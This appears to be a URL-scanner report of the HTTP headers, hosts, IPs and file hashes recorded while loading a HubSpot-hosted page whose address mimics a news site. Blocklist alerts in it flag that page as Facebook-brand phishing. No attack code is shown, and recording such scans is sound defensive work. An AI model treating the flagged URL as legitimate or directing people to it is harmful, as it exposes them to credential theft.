Md5:    c631eb0482ecfc3f8be7ec3dd40e1980
Sha1:   0e2d9432081e2b6d7dcc0554b989505ca7a2500a
Sha256: ae246bc92149787dd60e07688981447cd5f114d2436dd6edf36ec6551ab5a3c4
                                        
                                            GET /collectedforms.js HTTP/1.1 
Host: js-eu1.hscollectedforms.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.192.122
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Thu, 15 Sep 2022 09:56:53 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: W/"7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 c275031486c6f7b744b8d30847e98b14.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: AWscOfGeHaNRWzlDB9b9wJQggZ45nPDwH2aSKdo-mER9c-p5OiZJrQ==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74ac9bed5a05991e-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 40747
server: cloudflare
cf-ray: 74b07eba38a21685-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
Size:   23278
Md5:    dd30e369834dde1f747773589148967d
Sha1:   2c30d42e2f9667ef963d66ce26ac4f7508884491
Sha256: f7aaf3e282b3ff87688a165c87fc51542e136b5d6b37095309a25b2fc9984fa4
                                        
                                            GET /26246936.js HTTP/1.1 
Host: js-eu1.hs-banner.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.202.201
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
date: Thu, 15 Sep 2022 09:56:53 GMT
x-amz-id-2: XQ+/7nb3XbDh6/0sJfXjcBiNOijuoUPD7zz6On/eu+rzI+O79jVMwHy+sI50lbuvTCGgtXRo20c=
x-amz-request-id: S3G431KJREBNRV8Y
last-modified: Wed, 14 Sep 2022 11:45:12 GMT
etag: W/"025adeed3e76b7cd26ecf01b989b32e9"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
x-amz-version-id: N57oTE0A9i3iZTqsTCrYncdxG7sVG3sx
access-control-allow-origin: https://news4kcnn.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
expires: Thu, 15 Sep 2022 10:01:53 GMT
cf-cache-status: REVALIDATED
vary: Accept-Encoding
server: cloudflare
cf-ray: 74b07eba1ee795f0-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /cos-i18n/static-1.53/bundles/project.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 09 Nov 2021 16:12:42 GMT
etag: W/"61ca66de658cab9587e4636894680d5d"
x-amz-server-side-encryption: AES256
x-amz-version-id: P9ES7sOpFzrLl1QoRwjEAy5outPo5_GO
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 251aba405178d16c89041692c3261a47.cloudfront.net (CloudFront)
x-amz-cf-pop: HEL50-C1
x-amz-cf-id: 34g4n2oNRs8WvBEZGObRDrs6gH3jdmXpAmCs72tfRrSAm6YeuGEZUA==
cf-cache-status: HIT
age: 139259
expires: Fri, 15 Sep 2023 09:56:51 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2KyBmYIJRJrs3HR0dJTa5QMDv14amb%2FRscOi0JAtKjcvM9KrdW4NCp7lfv9kDwoJYC5Pqns5buwCBfhYP7b7lmIxAtcKNLsB8dA01s8IrLrokb%2Bns71xdnH5fzi8gqAzPO2gYea5feU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74b07ead5d261bfe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117121741/1663156028974/marketplace/Sprocket_Rocket/sr-theme-free/css/bootstrap.min.css HTTP/1.1 
Host: cdn1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.64.153.30
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
cf-ray: 74b07eacacd6b509-OSL
access-control-allow-origin: *
cache-control: public, max-age=1209600
etag: W/"c88bd7615d4ee2fd33a13cb75405c830"
expires: Thu, 29 Sep 2022 09:56:51 GMT
last-modified: Wed, 14 Sep 2022 11:47:11 GMT
vary: Accept-Encoding
via: 1.1 b053873243f91b1bb6dc406ce0c67db4.cloudfront.net (CloudFront)
cf-cache-status: REVALIDATED
access-control-allow-methods: GET
x-amz-cf-id: K6nRyT9uDW41t2WPE2MUoI-UzkpS_1hL9_uoKASTbqeV6r5jq0LUPA==
x-amz-cf-pop: OSL50-P1
x-amz-id-2: 36Be7wHyHEEOf2F1wdahRkWQ6gNp5aA/Nk4hCzwanVFkYeXjD8mdClBOs8Y8Na5apGkrg2/o0z8=
x-amz-meta-created-unix-time-millis: 1663156030393
x-amz-request-id: E46DXWE3ZE4BQY55
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: DeLv0lvfDoMeJaIXttGZVwetqbFKKiUG
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReads 5
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReads 5
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Poppins:regular,300,600&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.211.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Thu, 15 Sep 2022 09:56:51 GMT
date: Thu, 15 Sep 2022 09:56:51 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117470969/1663156032537/marketplace/Sprocket_Rocket/sr-theme-free/css/custom-styles.css HTTP/1.1 
Host: cdn1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.64.153.30
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
cf-ray: 74b07ead4d97b509-OSL
access-control-allow-origin: *
cache-control: public, max-age=1209600
etag: W/"498bc73d25b9dc6a812c316d9cd729d5"
expires: Thu, 29 Sep 2022 09:56:51 GMT
last-modified: Wed, 14 Sep 2022 11:47:13 GMT
vary: Accept-Encoding
via: 1.1 f46773a8236e136c4f6648dd79a7af8e.cloudfront.net (CloudFront)
cf-cache-status: REVALIDATED
access-control-allow-methods: GET
x-amz-cf-id: ZIOeklDZXLt1r1yDgBN8iD-XnG_Lv3ZI1rMrMJsAGt4rz58ltcopDw==
x-amz-cf-pop: OSL50-P1
x-amz-id-2: IQfd/ZZRcu7clS5Edl9Cejf2Ci7p9Vvt2NvgDnk2aTr24T+jwbsgWmIYmxIjE+FvqKdoE17Y7lM=
x-amz-meta-created-unix-time-millis: 1663156032537
x-amz-request-id: JW14A1KGN4JM2J2K
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: 0U79poF8JgGlnWv7dPJzVsC10kSp.WnG
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReads 5
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReads 5
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /?fbclid=IwAR2SUqE3fjKPQKyOMxYQp-v0dMxgjllQibHMHfutOCraj_L8zYiwqwUzOPE HTTP/1.1 
Host: news4kcnn.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         104.18.33.253
HTTP/2 200 OK
content-type: text/html;charset=utf-8
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
cf-ray: 74b07ea86f391c16-OSL
cache-control: s-maxage=10,max-age=5
vary: Accept-Encoding
cf-cache-status: DYNAMIC
access-control-allow-credentials: false
cache-tag: CT-53117545672,P-26246936,CW-53116949197,CW-53117121730,CW-53117121734,CW-53118088388,E-53116948940,E-53116948942,E-53116948943,E-53116948945,E-53117121515,E-53117121739,E-53117121741,E-53117121742,E-53117470969,PGS-ALL,SW-0,TS-53117471166
edge-cache-tag: CT-53117545672,P-26246936,CW-53116949197,CW-53117121730,CW-53117121734,CW-53118088388,E-53116948940,E-53116948942,E-53116948943,E-53116948945,E-53117121515,E-53117121739,E-53117121741,E-53117121742,E-53117470969,PGS-ALL,SW-0,TS-53117471166
x-hs-cache-config: BrowserCache-5s-EdgeCache-10s
x-hs-content-id: 53117545672
x-hs-hub-id: 26246936
x-hubspot-correlation-id: 73d14f17-ac41-43f0-a1ed-c49483227d00
x-powered-by: HubSpot
x-robots-tag: none
x-trace: 2BE5AD122CB41206BD7A163DE5587EE6CB15D09368000000000000000000
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.10.207
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: SE
cdn-edgestorageid: 722, 617
last-modified: Mon, 25 Jan 2021 22:04:55 GMT
cdn-cachedat: 2021-03-10 20:26:20
cdn-requestpullsuccess: True
cdn-requestpullcode: 200
cache-control: public, max-age=31919000
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
x-content-type-options: nosniff
cdn-requestid: 121d365db7a9aba3915641185d93b963
cdn-cache: HIT
cf-cache-status: HIT
age: 12546618
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74b07eac7a1ab4e8-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117121742/1663156035455/marketplace/Sprocket_Rocket/sr-theme-free/js/interaction.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.64.153.30
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
x-hs-alternate-content-type: text/plain
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
cf-ray: 74b07eacacd4b509-OSL
access-control-allow-origin: *
age: 75320
cache-control: public, max-age=1209600
etag: W/"7aaf15d8888fb0d938235508aaa643ff"
expires: Thu, 29 Sep 2022 09:56:51 GMT
last-modified: Wed, 14 Sep 2022 11:47:16 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663156035636
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReads 5
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReads 5
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /HubspotToolsMenu/static-1.138/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
x-amz-replication-status: COMPLETED
last-modified: Wed, 27 Jul 2022 14:35:54 GMT
etag: W/"0d86ec7be24f2dff2308b8edf54c2f32"
x-amz-server-side-encryption: AES256
x-amz-version-id: k79.hN9WG526nViFF800Vr3DxQF_q.yo
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2f7792bdc67f7953e2dce93aea1bb9ee.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: YLTjijGIrvYs-mnf4m802qhKaeCMPTJPO9kWnGo7DPUFSWw4moWKag==
cf-cache-status: HIT
age: 1793768
expires: Fri, 15 Sep 2023 09:56:51 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mL9OTJ3KmfxcgTxMVo6DpbOZSen6V1KaABd3ula4UJP6dDAPEYiDWl1L9OBymTZUl2Ry7T5fLws7QatqvLOJYzzrWu2QiqwLGV9jt%2F1mQSG2wsVgbFJK5Qt5%2Bg4jyl0TsGXcozyipQA%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74b07ead9d601bfe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /26246936.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.208.22
HTTP/2 200 OK
content-type: application/javascript;charset=utf-8
                                        
date: Thu, 15 Sep 2022 09:56:52 GMT
x-trace: 2BB96CAE529447160A0B33B7B825659559539BEFA4000000000000000000
cache-control: public, max-age=30
vary: Accept-Encoding
x-hubspot-correlation-id: ef5c768c-d0b5-406d-a916-e338acc39ca3
access-control-allow-credentials: true
access-control-max-age: 3600
access-control-allow-origin: https://news4kcnn.hs-sites-eu1.com
cf-cache-status: EXPIRED
last-modified: Thu, 15 Sep 2022 06:52:20 GMT
server: cloudflare
cf-ray: 74b07eb3086095f4-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---